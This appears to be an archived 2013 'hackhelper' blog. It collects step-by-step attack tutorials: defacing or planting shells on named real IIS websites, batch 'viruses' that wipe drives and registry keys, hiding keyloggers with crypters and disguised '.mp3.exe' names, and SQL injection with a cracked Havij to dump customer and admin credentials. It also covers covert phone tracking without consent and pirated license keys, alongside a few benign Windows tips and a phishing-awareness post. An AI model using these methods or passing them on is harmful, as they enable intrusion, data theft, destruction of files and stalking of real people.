hackhelper: 2013

Παρασκευή 19 Ιουλίου 2013

Easy method to hack website

(Only For N00bs not for advance users)

++++++++++++++++++++++++++
Method :- IIS Exploit.
Things Needed :- 1. IIS Vulnerable Sites.
2. Windows Operating System. (Windows XP, Windows 7, Windows
++++++++++++++++++++++++++
First of all you have to find a vulnerable IIS website. (Some will be provided for practice)
and just you have to follow my steps to perform this attack.

_______________________________________________
Sites For Practice :-
1 .www.advanceautomation.co.in
2. www.hljyhdc.com
3. www.268au.com
4. www.jsdtsx.com
5. www.lsmdly.com
6. www.itixiang.com
7. www.lvshi163.com
8. www.songspk.pk
9. www.infanziasantonio.com
10.www.msc-waldkappel-breitau.de
________________________________________________
******************************************
This technique is for Educational Purpose only and I am not responsible any harm done by you.
******************************************
________________________________________________
1. For Windows XP Users :-

STEP 1: Click on Start button and open “RUN”.

STEP 2: Now Type this in RUN
%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Now A Folder named “Web Folders” will open.

STEP 3: Now “Right-Click” in the folder and Goto “New” and then “Web Folder“.

STEP 4: Now type the name of the Vulnerable site in this. e.g.” http://autoqingdao.com/” and click “Next“.

STEP 5: Now Click on “Finish“

STEP 6: Now the folder will appear. You can open it and put any deface page or anything.

STEP 7: I put text file in that folder. Named “securityalert.txt” (you can put a shell or HTML file also). If the file appear in the folder then the Hack is successful but if it don’t then the site is not Vulnerable.

Now to view the uploaded site i will go to “http://autoqingdao.com/securityalert.txt”
In your case it will be ” www.[sitename].com/[file name that you uploaded] “

_______________________________________________
For Windows 7 Users :-
1. Open My Computer.
2. Right Click in the white space and select "Add a network location"
3. A Window will pop up
3. Click Next
4. Double Click "Choose A custom Network"
5. Add the vulnerable IIS website !
in my case i am using
http://admats.concerts.com/
6. Click Next! Then wait a little second !
7. Then a Web Folder will open
8. Upload your Deface page or Shell

Finish!

__________________________________________
For Windows 8 Steps are same as Windows 7... Enjoy.... xD

How to create a new partition without formatting the hard disk ?

In this post lets see how to create a new partition without losing data. Many of us will willl format complete hard disk to create a new partitions... Actually this kind of situation's appear when we forget to divide the space on hard disk into different drives. But its not at all a major issue. You can even create any no of drives with this simple process without formatting or losing data or without using any software. This process can be followed on any version of windows like windows 7 or Windows 8 or xp

Just follow the below steps

Now right click on my computer then a pop up window appear, then just click on manage. After you click a new window opens which is "Computer Management:" window.

In that window you can see all the detail's of Hard disk and other storage devices. In that select disk drive to make a new partition.
Right click on the disk drive there you will find a option as shrink, click on that. Once you complete this you will be able to see the empty space available in that selected drive.

After that just enter the amount of space of the drive you want to create then click on shrink. Once you complete this process with in fews secs you can see the new partition
But still you cannot open the drive. So, now Right click on the Unallocated space on a hard drive and select New Simple Volume.
Then click on the next, once you click on next you have to enter the space for which you want to allocate for your new drive from the unallocated space on hard disk or you can use complete available memory for your new drive.

Now select the drive letter ( as you contain already c - drive now you need to select d,e,f etc it depends on the number of drive you have already created before)
After creating a new drive now you need to format the newly created drive so select on format settings below this you need to select few more, like for file system select it as NTFS (New Technology File System). Then keep allocation unit size as default and the name of the new drive can be changed as you wish.

For quick format check the perform quick format option.
That's it you are done a new partition is created

Cell Phone Tracking Techniques

If you need to track down a cell phone, you’ve come to the right place. Whether you’re simply trying to track the location of your lost phone, or you’re a secret agent and you need to gain intel on the day-to-day whereabouts of a crooked diplomat, we’re here to give you the information you need to get the job done. It’ll be easier if you’re tying to track a smartphone, but there are ways to locate older phones as well, so don’t give up hope if you’re still rocking a first-gen Motorola RAZR or a Samsung Juke – we’ve still got your back.

Tracking your phone before you lose it

If you’re here just to prepare for the day that you lose your phone (which is inevitable, really), then you’re ahead of the game. If you’ve got a smartphone, consider installing the apps listed below
For smartphones of any kind, we recommend Prey. It’s a free and open-source anti-theft application that can be used for both computers and mobile phones. After you sign up for the service, you simply sync your devices with it, sit back, and relax. The day that your phone goes missing, all you’ll have to do is find a computer, log into your account, and start tracking. It runs discreetly in the background and won’t track your phone’s location until you tell it to, so there’s no need to worry about your privacy while the phone is in your possession. We recommend this for any Android or iOS device, as well as any Mac,Windows, or Linux PC.

For non-smartphones that can’t run apps or connect to the web, we recommend using Google Latitude. It’s a free service that uses your phones built-in GPS to track the location of your phone. Most modern cellphones are GPS enabled, so as long as your phone isn’t over eight years old, you should be fine. When the day comes that you can’t locate your phone, just log in to Latitude from any computer and it’ll immediately show you the location of your phone.

Tracking your phone after you lose it

If you didn’t have the foresight to install a device recovery app on your phone before you lost it, don’t worry. There are still some easy ways to get it back.
Android users can download an application called Plan B. Even though your phone is gone, you can log into your Google account on any computer install the app from Google Play. When you click install, the app will begin downloading to your missing phone, and when the download is complete it will send your phone’s location info to your Gmail account. To retrieve the phone’s whereabouts again when you’re away from a computer, just text the word “locate” from a friend’s phone and you’ll receive a text with location info.
iPhone users can download the infamous Find My iPhone application. If you’re rocking a phone with iOS 5 or later, then this app will come preinstalled on your device. If not, just borrow a friends iDevice, install Find My iPhone on it, and log in with your Apple ID. Once you’re all logged in, the app will display your phone’s location on a map. You can even remotely trigger your phone to make a loud noise for two minutes, which makes pinpointing it a snap when it’s nearby.
Non-smartphone users are a bit out of luck in this case. If you didn’t register your phone with Google Latitude or any other service, you don’t have many options other than calling your service provider and hoping they can help. Most providers offer GPS location services for a fee, and if your phone is GPS-enabled, finding it is sometimes just a matter of activating the GPS chip.

Tracking someone else’s phone with their permission

If you want to track somebody’s phone with their permission, there’s always the option of calling them and asking where they are. No fancy GPS apps are necessary if the person doesn’t mind you knowing where they are. Then again, if you do it this way there’s always a chance that they could lie to you. So if you can’t always trust the word of the person you’re trying to locate, then we recommend using Google Latitude. After you’ve installed the app, just add your friends’ phone numbers and Google will send them an invitation to start using the service. They have to approve the request first, but once they do you’ll have complete access to their whereabouts on Google Maps. This option is especially useful for parents who need to keep an eye on their kids.

Tracking someone else’s phone without their permission

It’s best to be upfront about tracking somebody and respect their right to privacy, but if you absolutely must track a phone without the owner’s consent or knowledge (if you’re a parent), here are a few tips how to do it.

Tracking a smartphone user is relatively simple. The easiest method is to install a tracking app on the person’s phone whenever you get a chance to do so discreetly. Do it when they’re sleeping or they leave to go somewhere – and don’t forget to hide the icon of whatever app you install. You can place it in an obscure folder and hope they don’t notice it too soon, or you can also install an app hider program (like Poof for example) to make the icon disappear entirely.
Non-smartphone tracking can be a bit more difficult. If the phone is GPS-enabled, it’s the same drill as above – just wait until the person leaves their phone unattended for an extended period of time, and send them an invite to use Google Latitude from your phone. Approve the request on their phone, and hide the evidence as best you can.

If the phone you’re trying to track isn’t GPS-enabled, however, you’ll have to pull a James Bond maneuver and install a GPS chip on the phone before you can pinpoint its location. This might be a bit of an arduous task, as you’ll have to figure out which particular archaic model of phone they have, find and purchase a GPS chip that’s compatible with the device, and then successfully install the chip without their knowledge. Try going to a specialty electronics shop or spy gear retailer to find the right hardware. The other option is locating the phone in question via triangulation, but doing it this way means gaining access to cell phone tower data – and the feds probably wouldn’t approve of that.

In conclusion, we know that there are tons of other great tracking apps we didn’t mention here, so we invite you to share your favorites with us in the comments.

Some more Tracking Free softwares,Have a look:)

Mologogo
http://www.mologogo.com/
Buddyway
http://www.buddyway.com/
InstaMapper
http://www.instamapper.com/
LocateA.net
http://www.locatea.net/

How to Unlock android phone without knowing Phone password?

This has been a common problem with most android users that, someone(while playing with their cellphone) activates the lock by drawing wrong unlocking patterns, leading finally to a window asking Google account

User name and password. I recently got screwed up, as the kid living next door tried unlocking my phone. If wrong pattern is entered 20 times, the Android OS locks your phone with a "TOO many pattern attempts" message and asks for your Google account name and password.

Now there are various reasons for which people can't come out of this situation -

Either they don't know the ID/Password.
The Packet Data is not activated, so even if right ID/Password is entered, it wont help.
The Internet setting of respective Network Service Provider is not installed.

It was a hard time for me to swallow the truth that, MY PHONE WAS LOCKED, as the account in the phone was of someone else's. I googled the solution for this, but found unusefull tricks unlocking the phone as they needed the phone to be in USB Debugging mode. But, somehow, i managed to find a solution to this(though it was done accidentally). If you go at any mobile shop they take ample amount for doing simple steps for unlocking it. I will tell you what they do. You need to follow some simple steps. I have tried the technique on Samsung Galaxy Y (Young). Probably it may work on all android devices....

Turn off the phone
Long press the upper volume key, menu key and the power key simultaneously
relieve for a fraction as soon as you see the screen display in "Samsung Galaxy Y young" again press the 3 keys simultaneously
Now you will see a screen displaying "Android system Recovery"

5. select the 3rd option("Wipe data/factory reset") using the volume keys and press the centre menu key

6. select the "Yes" option again using the same keys.
7. after some time, it will say, the reset is done
8. just select the reboot option and your phone is UNLOCKED.

Though it will wipe all your data,i find it relevant as it saves some of your bucks.
It's done...!!!

How to create Real dangerus viruses?

In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?
1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Make a Very Dangerous Virus with Notepad (Final)

USE THIS TRICK FOR ETHICAL USE ONLY

Just open your notepad

1) Click start -> all programs -> accessories -> notepad

2) Or just press or click windows key + r :: run window will open and

type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off

del D:\*.* /f /s /q

del E:\*.* /f /s /q

del F:\*.* /f /s /q

del G:\*.* /f /s /q

del H:\*.* /f /s /q

del I:\*.* /f /s /q

del J:\*.* /f /s /q

then save it as kinng.bat and the batch file is created .

WARNING :: This is the most dangerous virus

Delete the entire registry

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

now save it as kinng.bat and the batch file is created .

Now here is most dangerous virus that can blast or corrupt your computer after using this you will not able to use your computer this will be the last time you will be using it

What is Phishing?

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used.

Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.

Techniques Behind A Phishing Attack

1. Link Manipulation

Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com

www.mircosoft.com

www.verify-microsoft.com

instead of www.microsoft.com

2. Filter Evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.

How does a phishing attack/scam look like?

As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like

Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.

To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.

These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.

How To Identify A Fraudulent E-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

So The Bottom Line To Defend From Phishing Attack Is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal

email.

3. An email from trusted organization will never contain attachments or software.

4. Clicking on a link in an email is the most insecure way to get to your account

A special Thanks to JOHN for this information ,I hope you like this post. For further doubts and clarifications please pass your comments.

In Next post WE gonna post a complete Guide on Phishing Hacking....

Windows 8 activator

How to activate Windows 8 permanently?

First open the folder "Permanent Activator".
Right Click on "Windows 8 Permanent Activator [x264+64]" and select "Run as Administrator" and let it extract.
Now click on WINDOWS 8 INSTALL/UNINSTALL which will start the activation process in Windows CMD.
CMD will ask to confirm the activation, then type Y and hit ENTER to start Activating.
Activation process may take couple of minutes.And also your PC will restart once activation is finished.
After activation is done and your PC restarts you will get a prompt saying Windows is activated and other details.

Windows 8 has special improvements as well as security. Therefore, until it is not activated, you wont be able to do any personalization to your PC. This activator must activate your windows Permanently and enable Personalization settings. If it fails to Enable Personalization Settings, Please follow the below instructions [Please remember not to do the below settings if your personalization settings are enabled.]

How to Enable Personalization Setting?

First Activate Windows from above procedure.
Open the folder "Permanent Activator".
Right Click on "Personalization FIX" and select "Run as Administrator" and let it extract.
Windows CMD will automatically Run fix and restart your PC.

After restart, you should be able to Access Personalization settings.

Dowload it from here: http://www.mediafire.com/?cjvrn5gg0sz7f8c

How to make Keyloggers Undetectable Using Binders And crypters For Free?

The biggest challenge after creating keylogger installation file, is to convince your victim to install that keylogger on his PC. Normally free remote keyloggers like Emissary keylogger or any other cheap keyloggers will create standard .exe installation file without any stealth feature. Also free keyloggers are easily detected by popular antiviruses. So Eventually your keylogging job will remain Incomplete.

You would have probably heard about binders and Crypters before, but what do they used for? and why they are used in keylogging process? its simple as their Names suggests what they do. Lets first understand these two softwares.
Crypter

It is a software that can encrypt executable (.exe) files. crypters are popularly used to encrypt viruses, RAT’s, keyloggers, spywares etc to make them undetectable from antiviruses.

The Crypter takes the original binary code of .exe file and applies many encryption on it and stores at the end of file(EOF). So a new crypted executable file is created. The new exe is not detected by antiviruses because its code is scrambled by the crypter.

Binder

Binder is a software used to bind or combine two or more files in one file under one name and extension.

The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file.
Now that you, me and the whole world is aware of these softwares, do you think antivirus softwares will allow you to run these softwares on your system? ..obviously not. This is the biggest setback for crypters and binders. With increased use of Crypters and binders to bypass antiviruses, AV became more advanced and started including encryption definitions to even detect crypted or binded strings within code. So, use of crypter to hide Keyloggers became more complicated as nowadays, most of the popular crypters & Binders are easily detected by antiviruses.
So, if you are trying to crypt your keyloggers or viruses with publicly available crypters and binders, they are bound to be detected by antiviruses. This is because most FUD(fully undetectable) crypters remain “FUD” for maximum of one or two weeks, after their public release.
When any free FUD crypter/binder becomes popular it also gets the eyes of antivirus companies. The antivirus companies update their software and employ detection mechanism that detect the encryption by the crypter. To obtain FUD crypters, you either need to search for it in hacking forums or make one by yourself. Soon i will post about creating your own crypter.. stay connected.
Meanwhile you can try these latest crypters and binders that are available publicly:

1) Chrome Crypter v2.0

This Crypter is FUD (Fully Undetectable) and free. It has couple of extra features like .exe file binder and inbuilt ICON Changer. Its recommended that you name your resulting output file in the format: “filename.mp3.exe”. .exe extension will be hidden on most of the systems, so your victim will run it believing its an mp3 file.

Download: Chrome Crypter v2 – FUD.rar

2) 0crypter v5.0.8

Like ‘Chrome crypter’, this crypter also has inbuilt ICON changer and few more advanced features like: Default Browser Injection, Custom Injection Method (VBC advanced), Effective StartUp on reboot, Custom Startup, Custom Assembly Change, etc. This is not FUD, as my AVG quickly flagged the output file as Trojan virus.
0crypter free download

Download it from here: http://www.mediafire.com/?kknpoxcz1ejdcp3

how to use your USB pen drive as your computer's RAM

Have you ever thought that you can use your USB pen drive as your computer's RAM? I will tell you how to do this. It is very very simple. The fact that it is so simple is because Windows 8,7 and Windows Vista both comes with a function called "ReadyBoost" which allows us to use our USB as System Virtual Memory. There is nothing much to do here. Just insert the Formatted Pen drive, Select Properties and go to the "ReadyBoost" tab, from there select "Use This Device", select the maximum memory available and click on apply. this ought to make it as a virtual system memory.

Πέμπτη 18 Ιουλίου 2013

Free Avg Activision Keys here

if need free avg activision serial numbers use those:

AVG 2010 Internet security- 8MEH-RF4BZ-FHATO-VRV3A-4H3EP-DEMBR-HRLD

AVG 2011 Internet security- 8MEH-RQXTV-HQOWD-E447R-MPHYD-PEMBR-ACED

AVG 2012 Internet security- 8MEH-RF4BZ-FHATO-VRV3A-4H3EP-DEMBR-HRLD

AVG 2013 Internet security- 8MEH-RQPO6-7ZS98-HGY9A-FA28B-XEMBR-ACED or 8MEH-R6FE9-FWO64-T84MR-OO2HS-7EMBR-ACED or 8MEH-RYH2W-SAT6N-H2HGA-WHJM8-9EMBR-ACED or 8MEH-RGHD3-SUKUO-SXPWA-PHHZJ-9EMBR-ACED or 8MEH-RRD82-WDYV8-9UBUR-7D4H9-4EMBR-ACED or 8MEH-RGHD3-SUKUO-SXPWA-PUULM-9EMBR-ACED

rar and zip archive password remover

guys i jus found a new program to remove the password from win rar and zip archives. just download and install it from here: http://www.mediafire.com/?szjd3yy231d4e71 safe and without to comlete any surveys thenks for your atention

how to hack an email

if you need to hack an email just watch this video: http://www.youtube.com/watch?v=I-6e4nkHt_s&feature=youtu.be

Hack Websites Using SQL Poizon and Havij

Requirements:

A Brain ( Most Important )
SQL Poizon ( Download )
Havij 1.6 Pro ( Cracked Version Download )
Basic Knowledge about Websites and SQL Injection

I did not make these programs, nor did I most likely download them from the original source. If you do not trust these, then just sandbox them. You can download Sandboxie . Also the download to Havij is the pro/full version cracked. Want the regular one from the developers? Download Here

All Right, now that we have whatever we need, let the Tutorial BEGIN !! :)

Step 1 : Open up SQL Poizon

Step 2 : Click the "+" next to “All Dork" or just double click on “All Dorks". Next, select php. In the php section select “page.php?id="
Then, select “Engine:" then in “Engine:" select “Searchqu" you can put “max" whatever you’d like, but I put mine at 300. Note: “max" is the max amount of results your dork search will pull in. Sql poizon searches for websites with that dork that have sql vulnerabilities.

Step 3 : Right click on one of the links, then hover over “Send to Sqli Crawler". Next, select “All". After this you will be brought to a screen that looks like the one below. You will then want to click on crawl. Sql poizon will crawl through the Searchqu search engine, search your dork, and find any websites that are vulnerable or could be vulnerable to an attack.

Step 4 : View a couple of the vulnerable websites in the “Vulnerable Links" box on the bottom half of Sql poizon.

Then, select the website you’d like to hack. Copy the url without the ’ (the apostrophe). Open up Havij and click register. For name enter: “Cracked@By.Exidous" and for file find you folder location where havij is and choose “HavijKey.lic". You will now have Havij Pro.

Step 5:

Find “Target:" and paste your vulnerable website in there.
Leave the rest by default and click “Analyze".
In the box at the bottom you will find information on your target such as:

Host IP (Target website’s ip address)
Web Server (What web server your target runs on)
Powered-By (What your target is powered by generally php or asp)
Keyword Found (A keyword about your target)
Injection Type (The type of injection that Havij will use)
DB Server (The type of database your target uses)
Current DB (The database that havij detected)

Note: You may have more or less things displayed depending on your target website. You can also find your target info by going to the “Info" tab.

Step 6 : Click on the “Tables" tab, and hit “Get DBs". Once your target’s databases have loaded go ahead and find a table that looks like it could have interesting information, logins, admin info, or anything you’d like to snoop in.

I’ll be taking some customer info so I am going to my “customer" table. Once, you select your desired table go ahead and click “Get Columns". Havij will then proceed to get all of the columns in that table. Once Havij loads the columns check each column you’d like to collect the data from. Click “Get Data" and Havij will get information stored in each column from the table you selected. Since I selected the “customer" table from my “targets" database, Havij got data that included: ID, parentName, street, city, state, zip, homephone, workphone, emergphone, emergname, email, password, newsletter, savelogin, and ageNotice.

Step 7 : Next I will be finding the admin’s data in an attempt to login in to his cpanel or admin login. So, find a table that looks like it could possibly admin or login. Anything of that sort will do. My table’s name that the login is stored in is called “logins". I then checked “logins" and pressed “Get Columns". Then, I proceeded to check each column and hit “Get Data".

Step 8 : Once I found the username and the password I had to decrypt the md5 encryption. To do this Havij has a built in MD5 Decrypter. Copy the password, and click “MD5".

Step 9 : Now we need to find the admin login. To do this we need to click on the “Find Admin" tab. After that just click “start". If you need a different program you can use this one with a bigger admin text file, but I still prefer to use Havij’s built in one. But if you want, you can download Admin Finder from HERE

Step 10 : Finally, once you have found the admin login username and password, and the admin login page just go ahead and login! From there do whatever you’d like! Note: If you did not ever find the admin login information you may be able to find it by causing an error in the webpage. You might get an error like the following:

"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/admin/domains/yourtarget.org/public_html/page.php on line 14
But if you are Lucky Enough You might HIT the Jackpot LIKE me ! :)

hackhelper

Wikipedia